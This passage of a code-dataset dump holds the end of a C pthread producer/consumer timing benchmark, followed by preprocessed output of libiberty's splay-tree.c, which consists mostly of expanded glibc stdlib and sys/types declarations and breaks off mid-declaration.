case 'w':
g_tasks = atoi(optarg);
break;
default:
usage(argv[0]);
}
}
if (g_threads % 2)
usage(argv[0]);
#if defined(__FreeBSD__)
pthread_setconcurrency(g_threads);
#endif
// fprintf(stderr, "debug: %d\n", g_debug);
// fprintf(stderr, "loops: %d\n", g_loops);
// fprintf(stderr, "touchmem: %d\n", g_touchmem);
// fprintf(stderr, "threads: %d\n", g_threads);
// fprintf(stderr, "allocsize: %d\n", g_size);
// fprintf(stderr, "work: %d\n", g_tasks);
assert(pthread_barrier_init(&barrier, NULL, g_threads) == 0);
tcbs = malloc(g_threads * sizeof(*tcbs));
for (i = 0; i < g_threads; i += 2)
{
struct queue * q;
struct task * t;
q = malloc(sizeof(*q));
q->h = NULL;
assert(pthread_cond_init(&q->c_full, NULL) == 0);
assert(pthread_cond_init(&q->c_empty, NULL) == 0);
assert(pthread_mutex_init(&q->m, NULL) == 0);
q->done = 0;
t = malloc(sizeof(*t));
t->f = producer;
t->q = q;
assert(pthread_create(&tcbs[i + 0], NULL, threadmain, t) == 0);
t = malloc(sizeof(*t));
t->f = consumer;
t->q = q;
assert(pthread_create(&tcbs[i + 1], NULL, threadmain, t) == 0);
}
gettimeofday(&t1, NULL);
for (i = 0; i < g_threads; ++i)
assert(pthread_join(tcbs[i], NULL) == 0);
gettimeofday(&t2, NULL);
timersub(&t2, &t1, &t3);
fprintf(stderr, "%.4f seconds\n", (t3.tv_sec * 1000000.0 + t3.tv_usec) / 1000000.0);
free(tcbs);
assert(pthread_barrier_destroy(&barrier) == 0);
return EXIT_SUCCESS;
}
|
the_stack_data/50136700.c | # 1 "/home/giulianob/gcc_git_gnu/gcc/libiberty/splay-tree.c"
# 1 "/home/giulianob/gcc_git_gnu/build_temp/libiberty//"
# 1 "<built-in>"
# 1 "<command-line>"
# 1 "/usr/include/stdc-predef.h" 1 3 4
# 1 "<command-line>" 2
# 1 "/home/giulianob/gcc_git_gnu/gcc/libiberty/splay-tree.c"
# 28 "/home/giulianob/gcc_git_gnu/gcc/libiberty/splay-tree.c"
# 1 "./config.h" 1
# 29 "/home/giulianob/gcc_git_gnu/gcc/libiberty/splay-tree.c" 2
# 1 "/usr/include/stdlib.h" 1 3 4
# 25 "/usr/include/stdlib.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 1 3 4
# 33 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 3 4
# 1 "/usr/include/features.h" 1 3 4
# 461 "/usr/include/features.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/sys/cdefs.h" 1 3 4
# 452 "/usr/include/x86_64-linux-gnu/sys/cdefs.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4
# 453 "/usr/include/x86_64-linux-gnu/sys/cdefs.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/long-double.h" 1 3 4
# 454 "/usr/include/x86_64-linux-gnu/sys/cdefs.h" 2 3 4
# 462 "/usr/include/features.h" 2 3 4
# 485 "/usr/include/features.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/gnu/stubs.h" 1 3 4
# 10 "/usr/include/x86_64-linux-gnu/gnu/stubs.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/gnu/stubs-64.h" 1 3 4
# 11 "/usr/include/x86_64-linux-gnu/gnu/stubs.h" 2 3 4
# 486 "/usr/include/features.h" 2 3 4
# 34 "/usr/include/x86_64-linux-gnu/bits/libc-header-start.h" 2 3 4
# 26 "/usr/include/stdlib.h" 2 3 4
# 1 "/usr/lib/gcc/x86_64-linux-gnu/10/include/stddef.h" 1 3 4
# 209 "/usr/lib/gcc/x86_64-linux-gnu/10/include/stddef.h" 3 4
# 209 "/usr/lib/gcc/x86_64-linux-gnu/10/include/stddef.h" 3 4
typedef long unsigned int size_t;
# 321 "/usr/lib/gcc/x86_64-linux-gnu/10/include/stddef.h" 3 4
typedef int wchar_t;
# 32 "/usr/include/stdlib.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/waitflags.h" 1 3 4
# 52 "/usr/include/x86_64-linux-gnu/bits/waitflags.h" 3 4
typedef enum
{
P_ALL,
P_PID,
P_PGID
} idtype_t;
# 40 "/usr/include/stdlib.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/waitstatus.h" 1 3 4
# 41 "/usr/include/stdlib.h" 2 3 4
# 55 "/usr/include/stdlib.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/floatn.h" 1 3 4
# 120 "/usr/include/x86_64-linux-gnu/bits/floatn.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/floatn-common.h" 1 3 4
# 24 "/usr/include/x86_64-linux-gnu/bits/floatn-common.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/long-double.h" 1 3 4
# 25 "/usr/include/x86_64-linux-gnu/bits/floatn-common.h" 2 3 4
# 121 "/usr/include/x86_64-linux-gnu/bits/floatn.h" 2 3 4
# 56 "/usr/include/stdlib.h" 2 3 4
typedef struct
{
int quot;
int rem;
} div_t;
typedef struct
{
long int quot;
long int rem;
} ldiv_t;
__extension__ typedef struct
{
long long int quot;
long long int rem;
} lldiv_t;
# 97 "/usr/include/stdlib.h" 3 4
extern size_t __ctype_get_mb_cur_max (void) __attribute__ ((__nothrow__ , __leaf__)) ;
extern double atof (const char *__nptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ;
extern int atoi (const char *__nptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ;
extern long int atol (const char *__nptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ;
__extension__ extern long long int atoll (const char *__nptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ;
extern double strtod (const char *__restrict __nptr,
char **__restrict __endptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern float strtof (const char *__restrict __nptr,
char **__restrict __endptr) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern long double strtold (const char *__restrict __nptr,
char **__restrict __endptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
# 140 "/usr/include/stdlib.h" 3 4
extern _Float32 strtof32 (const char *__restrict __nptr,
char **__restrict __endptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern _Float64 strtof64 (const char *__restrict __nptr,
char **__restrict __endptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern _Float128 strtof128 (const char *__restrict __nptr,
char **__restrict __endptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern _Float32x strtof32x (const char *__restrict __nptr,
char **__restrict __endptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern _Float64x strtof64x (const char *__restrict __nptr,
char **__restrict __endptr)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
# 176 "/usr/include/stdlib.h" 3 4
extern long int strtol (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern unsigned long int strtoul (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
__extension__
extern long long int strtoq (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
__extension__
extern unsigned long long int strtouq (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
__extension__
extern long long int strtoll (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
__extension__
extern unsigned long long int strtoull (const char *__restrict __nptr,
char **__restrict __endptr, int __base)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern int strfromd (char *__dest, size_t __size, const char *__format,
double __f)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3)));
extern int strfromf (char *__dest, size_t __size, const char *__format,
float __f)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3)));
extern int strfroml (char *__dest, size_t __size, const char *__format,
long double __f)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3)));
# 232 "/usr/include/stdlib.h" 3 4
extern int strfromf32 (char *__dest, size_t __size, const char * __format,
_Float32 __f)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3)));
extern int strfromf64 (char *__dest, size_t __size, const char * __format,
_Float64 __f)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3)));
extern int strfromf128 (char *__dest, size_t __size, const char * __format,
_Float128 __f)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3)));
extern int strfromf32x (char *__dest, size_t __size, const char * __format,
_Float32x __f)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3)));
extern int strfromf64x (char *__dest, size_t __size, const char * __format,
_Float64x __f)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (3)));
# 272 "/usr/include/stdlib.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/locale_t.h" 1 3 4
# 22 "/usr/include/x86_64-linux-gnu/bits/types/locale_t.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/__locale_t.h" 1 3 4
# 28 "/usr/include/x86_64-linux-gnu/bits/types/__locale_t.h" 3 4
struct __locale_struct
{
struct __locale_data *__locales[13];
const unsigned short int *__ctype_b;
const int *__ctype_tolower;
const int *__ctype_toupper;
const char *__names[13];
};
typedef struct __locale_struct *__locale_t;
# 23 "/usr/include/x86_64-linux-gnu/bits/types/locale_t.h" 2 3 4
typedef __locale_t locale_t;
# 273 "/usr/include/stdlib.h" 2 3 4
extern long int strtol_l (const char *__restrict __nptr,
char **__restrict __endptr, int __base,
locale_t __loc) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 4)));
extern unsigned long int strtoul_l (const char *__restrict __nptr,
char **__restrict __endptr,
int __base, locale_t __loc)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 4)));
__extension__
extern long long int strtoll_l (const char *__restrict __nptr,
char **__restrict __endptr, int __base,
locale_t __loc)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 4)));
__extension__
extern unsigned long long int strtoull_l (const char *__restrict __nptr,
char **__restrict __endptr,
int __base, locale_t __loc)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 4)));
extern double strtod_l (const char *__restrict __nptr,
char **__restrict __endptr, locale_t __loc)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 3)));
extern float strtof_l (const char *__restrict __nptr,
char **__restrict __endptr, locale_t __loc)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 3)));
extern long double strtold_l (const char *__restrict __nptr,
char **__restrict __endptr,
locale_t __loc)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 3)));
# 316 "/usr/include/stdlib.h" 3 4
extern _Float32 strtof32_l (const char *__restrict __nptr,
char **__restrict __endptr,
locale_t __loc)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 3)));
extern _Float64 strtof64_l (const char *__restrict __nptr,
char **__restrict __endptr,
locale_t __loc)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 3)));
extern _Float128 strtof128_l (const char *__restrict __nptr,
char **__restrict __endptr,
locale_t __loc)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 3)));
extern _Float32x strtof32x_l (const char *__restrict __nptr,
char **__restrict __endptr,
locale_t __loc)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 3)));
extern _Float64x strtof64x_l (const char *__restrict __nptr,
char **__restrict __endptr,
locale_t __loc)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 3)));
# 360 "/usr/include/stdlib.h" 3 4
extern __inline __attribute__ ((__gnu_inline__)) int
__attribute__ ((__nothrow__ , __leaf__)) atoi (const char *__nptr)
{
return (int) strtol (__nptr, (char **) ((void *)0), 10);
}
extern __inline __attribute__ ((__gnu_inline__)) long int
__attribute__ ((__nothrow__ , __leaf__)) atol (const char *__nptr)
{
return strtol (__nptr, (char **) ((void *)0), 10);
}
__extension__ extern __inline __attribute__ ((__gnu_inline__)) long long int
__attribute__ ((__nothrow__ , __leaf__)) atoll (const char *__nptr)
{
return strtoll (__nptr, (char **) ((void *)0), 10);
}
# 385 "/usr/include/stdlib.h" 3 4
extern char *l64a (long int __n) __attribute__ ((__nothrow__ , __leaf__)) ;
extern long int a64l (const char *__s)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__pure__)) __attribute__ ((__nonnull__ (1))) ;
# 1 "/usr/include/x86_64-linux-gnu/sys/types.h" 1 3 4
# 27 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types.h" 1 3 4
# 27 "/usr/include/x86_64-linux-gnu/bits/types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4
# 28 "/usr/include/x86_64-linux-gnu/bits/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/timesize.h" 1 3 4
# 29 "/usr/include/x86_64-linux-gnu/bits/types.h" 2 3 4
typedef unsigned char __u_char;
typedef unsigned short int __u_short;
typedef unsigned int __u_int;
typedef unsigned long int __u_long;
typedef signed char __int8_t;
typedef unsigned char __uint8_t;
typedef signed short int __int16_t;
typedef unsigned short int __uint16_t;
typedef signed int __int32_t;
typedef unsigned int __uint32_t;
typedef signed long int __int64_t;
typedef unsigned long int __uint64_t;
typedef __int8_t __int_least8_t;
typedef __uint8_t __uint_least8_t;
typedef __int16_t __int_least16_t;
typedef __uint16_t __uint_least16_t;
typedef __int32_t __int_least32_t;
typedef __uint32_t __uint_least32_t;
typedef __int64_t __int_least64_t;
typedef __uint64_t __uint_least64_t;
typedef long int __quad_t;
typedef unsigned long int __u_quad_t;
typedef long int __intmax_t;
typedef unsigned long int __uintmax_t;
# 141 "/usr/include/x86_64-linux-gnu/bits/types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/typesizes.h" 1 3 4
# 142 "/usr/include/x86_64-linux-gnu/bits/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/time64.h" 1 3 4
# 143 "/usr/include/x86_64-linux-gnu/bits/types.h" 2 3 4
typedef unsigned long int __dev_t;
typedef unsigned int __uid_t;
typedef unsigned int __gid_t;
typedef unsigned long int __ino_t;
typedef unsigned long int __ino64_t;
typedef unsigned int __mode_t;
typedef unsigned long int __nlink_t;
typedef long int __off_t;
typedef long int __off64_t;
typedef int __pid_t;
typedef struct { int __val[2]; } __fsid_t;
typedef long int __clock_t;
typedef unsigned long int __rlim_t;
typedef unsigned long int __rlim64_t;
typedef unsigned int __id_t;
typedef long int __time_t;
typedef unsigned int __useconds_t;
typedef long int __suseconds_t;
typedef int __daddr_t;
typedef int __key_t;
typedef int __clockid_t;
typedef void * __timer_t;
typedef long int __blksize_t;
typedef long int __blkcnt_t;
typedef long int __blkcnt64_t;
typedef unsigned long int __fsblkcnt_t;
typedef unsigned long int __fsblkcnt64_t;
typedef unsigned long int __fsfilcnt_t;
typedef unsigned long int __fsfilcnt64_t;
typedef long int __fsword_t;
typedef long int __ssize_t;
typedef long int __syscall_slong_t;
typedef unsigned long int __syscall_ulong_t;
typedef __off64_t __loff_t;
typedef char *__caddr_t;
typedef long int __intptr_t;
typedef unsigned int __socklen_t;
typedef int __sig_atomic_t;
# 30 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
typedef __u_char u_char;
typedef __u_short u_short;
typedef __u_int u_int;
typedef __u_long u_long;
typedef __quad_t quad_t;
typedef __u_quad_t u_quad_t;
typedef __fsid_t fsid_t;
typedef __loff_t loff_t;
typedef __ino_t ino_t;
typedef __ino64_t ino64_t;
typedef __dev_t dev_t;
typedef __gid_t gid_t;
typedef __mode_t mode_t;
typedef __nlink_t nlink_t;
typedef __uid_t uid_t;
typedef __off_t off_t;
typedef __off64_t off64_t;
typedef __pid_t pid_t;
typedef __id_t id_t;
typedef __ssize_t ssize_t;
typedef __daddr_t daddr_t;
typedef __caddr_t caddr_t;
typedef __key_t key_t;
# 1 "/usr/include/x86_64-linux-gnu/bits/types/clock_t.h" 1 3 4
typedef __clock_t clock_t;
# 127 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/clockid_t.h" 1 3 4
typedef __clockid_t clockid_t;
# 129 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/time_t.h" 1 3 4
typedef __time_t time_t;
# 130 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/timer_t.h" 1 3 4
typedef __timer_t timer_t;
# 131 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
typedef __useconds_t useconds_t;
typedef __suseconds_t suseconds_t;
# 1 "/usr/lib/gcc/x86_64-linux-gnu/10/include/stddef.h" 1 3 4
# 145 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
typedef unsigned long int ulong;
typedef unsigned short int ushort;
typedef unsigned int uint;
# 1 "/usr/include/x86_64-linux-gnu/bits/stdint-intn.h" 1 3 4
# 24 "/usr/include/x86_64-linux-gnu/bits/stdint-intn.h" 3 4
typedef __int8_t int8_t;
typedef __int16_t int16_t;
typedef __int32_t int32_t;
typedef __int64_t int64_t;
# 156 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
typedef __uint8_t u_int8_t;
typedef __uint16_t u_int16_t;
typedef __uint32_t u_int32_t;
typedef __uint64_t u_int64_t;
typedef int register_t __attribute__ ((__mode__ (__word__)));
# 176 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4
# 1 "/usr/include/endian.h" 1 3 4
# 24 "/usr/include/endian.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/endian.h" 1 3 4
# 35 "/usr/include/x86_64-linux-gnu/bits/endian.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/endianness.h" 1 3 4
# 36 "/usr/include/x86_64-linux-gnu/bits/endian.h" 2 3 4
# 25 "/usr/include/endian.h" 2 3 4
# 35 "/usr/include/endian.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/byteswap.h" 1 3 4
# 33 "/usr/include/x86_64-linux-gnu/bits/byteswap.h" 3 4
static __inline __uint16_t
__bswap_16 (__uint16_t __bsx)
{
return __builtin_bswap16 (__bsx);
}
static __inline __uint32_t
__bswap_32 (__uint32_t __bsx)
{
return __builtin_bswap32 (__bsx);
}
# 69 "/usr/include/x86_64-linux-gnu/bits/byteswap.h" 3 4
__extension__ static __inline __uint64_t
__bswap_64 (__uint64_t __bsx)
{
return __builtin_bswap64 (__bsx);
}
# 36 "/usr/include/endian.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/uintn-identity.h" 1 3 4
# 32 "/usr/include/x86_64-linux-gnu/bits/uintn-identity.h" 3 4
static __inline __uint16_t
__uint16_identity (__uint16_t __x)
{
return __x;
}
static __inline __uint32_t
__uint32_identity (__uint32_t __x)
{
return __x;
}
static __inline __uint64_t
__uint64_identity (__uint64_t __x)
{
return __x;
}
# 37 "/usr/include/endian.h" 2 3 4
# 177 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/sys/select.h" 1 3 4
# 30 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/select.h" 1 3 4
# 22 "/usr/include/x86_64-linux-gnu/bits/select.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4
# 23 "/usr/include/x86_64-linux-gnu/bits/select.h" 2 3 4
# 31 "/usr/include/x86_64-linux-gnu/sys/select.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/sigset_t.h" 1 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/__sigset_t.h" 1 3 4
typedef struct
{
unsigned long int __val[(1024 / (8 * sizeof (unsigned long int)))];
} __sigset_t;
# 5 "/usr/include/x86_64-linux-gnu/bits/types/sigset_t.h" 2 3 4
typedef __sigset_t sigset_t;
# 34 "/usr/include/x86_64-linux-gnu/sys/select.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/struct_timeval.h" 1 3 4
struct timeval
{
__time_t tv_sec;
__suseconds_t tv_usec;
};
# 38 "/usr/include/x86_64-linux-gnu/sys/select.h" 2 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/types/struct_timespec.h" 1 3 4
# 10 "/usr/include/x86_64-linux-gnu/bits/types/struct_timespec.h" 3 4
struct timespec
{
__time_t tv_sec;
__syscall_slong_t tv_nsec;
# 26 "/usr/include/x86_64-linux-gnu/bits/types/struct_timespec.h" 3 4
};
# 40 "/usr/include/x86_64-linux-gnu/sys/select.h" 2 3 4
# 49 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
typedef long int __fd_mask;
# 59 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
typedef struct
{
__fd_mask fds_bits[1024 / (8 * (int) sizeof (__fd_mask))];
} fd_set;
typedef __fd_mask fd_mask;
# 91 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
# 101 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
extern int select (int __nfds, fd_set *__restrict __readfds,
fd_set *__restrict __writefds,
fd_set *__restrict __exceptfds,
struct timeval *__restrict __timeout);
# 113 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
extern int pselect (int __nfds, fd_set *__restrict __readfds,
fd_set *__restrict __writefds,
fd_set *__restrict __exceptfds,
const struct timespec *__restrict __timeout,
const __sigset_t *__restrict __sigmask);
# 126 "/usr/include/x86_64-linux-gnu/sys/select.h" 3 4
# 180 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
typedef __blksize_t blksize_t;
typedef __blkcnt_t blkcnt_t;
typedef __fsblkcnt_t fsblkcnt_t;
typedef __fsfilcnt_t fsfilcnt_t;
# 219 "/usr/include/x86_64-linux-gnu/sys/types.h" 3 4
typedef __blkcnt64_t blkcnt64_t;
typedef __fsblkcnt64_t fsblkcnt64_t;
typedef __fsfilcnt64_t fsfilcnt64_t;
# 1 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h" 1 3 4
# 23 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 1 3 4
# 44 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h" 1 3 4
# 21 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/wordsize.h" 1 3 4
# 22 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h" 2 3 4
# 45 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 2 3 4
typedef struct __pthread_internal_list
{
struct __pthread_internal_list *__prev;
struct __pthread_internal_list *__next;
} __pthread_list_t;
typedef struct __pthread_internal_slist
{
struct __pthread_internal_slist *__next;
} __pthread_slist_t;
# 74 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/struct_mutex.h" 1 3 4
# 22 "/usr/include/x86_64-linux-gnu/bits/struct_mutex.h" 3 4
struct __pthread_mutex_s
{
int __lock;
unsigned int __count;
int __owner;
unsigned int __nusers;
int __kind;
short __spins;
short __elision;
__pthread_list_t __list;
# 53 "/usr/include/x86_64-linux-gnu/bits/struct_mutex.h" 3 4
};
# 75 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 2 3 4
# 87 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 3 4
# 1 "/usr/include/x86_64-linux-gnu/bits/struct_rwlock.h" 1 3 4
# 23 "/usr/include/x86_64-linux-gnu/bits/struct_rwlock.h" 3 4
struct __pthread_rwlock_arch_t
{
unsigned int __readers;
unsigned int __writers;
unsigned int __wrphase_futex;
unsigned int __writers_futex;
unsigned int __pad3;
unsigned int __pad4;
int __cur_writer;
int __shared;
signed char __rwelision;
unsigned char __pad1[7];
unsigned long int __pad2;
unsigned int __flags;
# 55 "/usr/include/x86_64-linux-gnu/bits/struct_rwlock.h" 3 4
};
# 88 "/usr/include/x86_64-linux-gnu/bits/thread-shared-types.h" 2 3 4
struct __pthread_cond_s
{
__extension__ union
{
__extension__ unsigned long long int __wseq;
struct
{
unsigned int __low;
unsigned int __high;
} __wseq32;
};
__extension__ union
{
__extension__ unsigned long long int __g1_start;
struct
{
unsigned int __low;
unsigned int __high;
} __g1_start32;
};
unsigned int __g_refs[2] ;
unsigned int __g_size[2];
unsigned int __g1_orig_size;
unsigned int __wrefs;
unsigned int __g_signals[2];
};
# 24 "/usr/include/x86_64-linux-gnu/bits/pthreadtypes.h" 2 3 4
typedef unsigned long int pthread_t;
typedef union
{
char __size[4];
int __align;
} pthread_mutexattr_t;
typedef union
{
char __size[4];
int __align;
} pthread_condattr_t;
typedef unsigned int pthread_key_t;
typedef int pthread_once_t;
union pthread_attr_t
{
char __size[56];
long int __align;
};
typedef union pthread_attr_t pthread_attr_t;
typedef union
{
struct __pthread_mutex_s __data;
char __size[40];
long int __align;
} pthread_mutex_t;
typedef union
{
struct __pthread_cond_s __data;
char __size[48];
__extension__ long long int __align;
} pthread_cond_t;
typedef union
{
struct __pthread_rwlock_arch_t __data;
char __size[56];
long int __align;
} pthread_rwlock_t;
typedef union
{
char __size[8];
long int __align;
} pthread_rwlockattr_t;
typedef volatile int pthread_spinlock_t;
typedef union
{
char __size[32];
long int __align;
} pthread_barrier_t;
typedef union
{
char __size[4];
int __align;
} pthread_barrierattr_t;
# 228 "/usr/include/x86_64-linux-gnu/sys/types.h" 2 3 4
# 395 "/usr/include/stdlib.h" 2 3 4
extern long int random (void) __attribute__ ((__nothrow__ , __leaf__));
extern void srandom (unsigned int __seed) __attribute__ ((__nothrow__ , __leaf__));
extern char *initstate (unsigned int __seed, char *__statebuf,
size_t __statelen) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2)));
extern char *setstate (char *__statebuf) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
struct random_data
{
int32_t *fptr;
int32_t *rptr;
int32_t *state;
int rand_type;
int rand_deg;
int rand_sep;
int32_t *end_ptr;
};
extern int random_r (struct random_data *__restrict __buf,
int32_t *__restrict __result) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int srandom_r (unsigned int __seed, struct random_data *__buf)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2)));
extern int initstate_r (unsigned int __seed, char *__restrict __statebuf,
size_t __statelen,
struct random_data *__restrict __buf)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (2, 4)));
extern int setstate_r (char *__restrict __statebuf,
struct random_data *__restrict __buf)
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1, 2)));
extern int rand (void) __attribute__ ((__nothrow__ , __leaf__));
extern void srand (unsigned int __seed) __attribute__ ((__nothrow__ , __leaf__));
extern int rand_r (unsigned int *__seed) __attribute__ ((__nothrow__ , __leaf__));
extern double drand48 (void) __attribute__ ((__nothrow__ , __leaf__));
extern double erand48 (unsigned short int __xsubi[3]) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern long int lrand48 (void) __attribute__ ((__nothrow__ , __leaf__));
extern long int nrand48 (unsigned short int __xsubi[3])
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern long int mrand48 (void) __attribute__ ((__nothrow__ , __leaf__));
extern long int jrand48 (unsigned short int __xsubi[3])
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern void srand48 (long int __seedval) __attribute__ ((__nothrow__ , __leaf__));
extern unsigned short int *seed48 (unsigned short int __seed16v[3])
__attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
extern void lcong48 (unsigned short int __param[7]) __attribute__ ((__nothrow__ , __leaf__)) __attribute__ ((__nonnull__ (1)));
struct drand48_data
{
unsigned short int __x[3];
unsigned short int __old_x[3];
unsigned short int __c;
unsigned short int __init;
__extension__ unsigned long long int __a;
};
extern int drand48_r (struct drand48_data *__restrict __buffer,
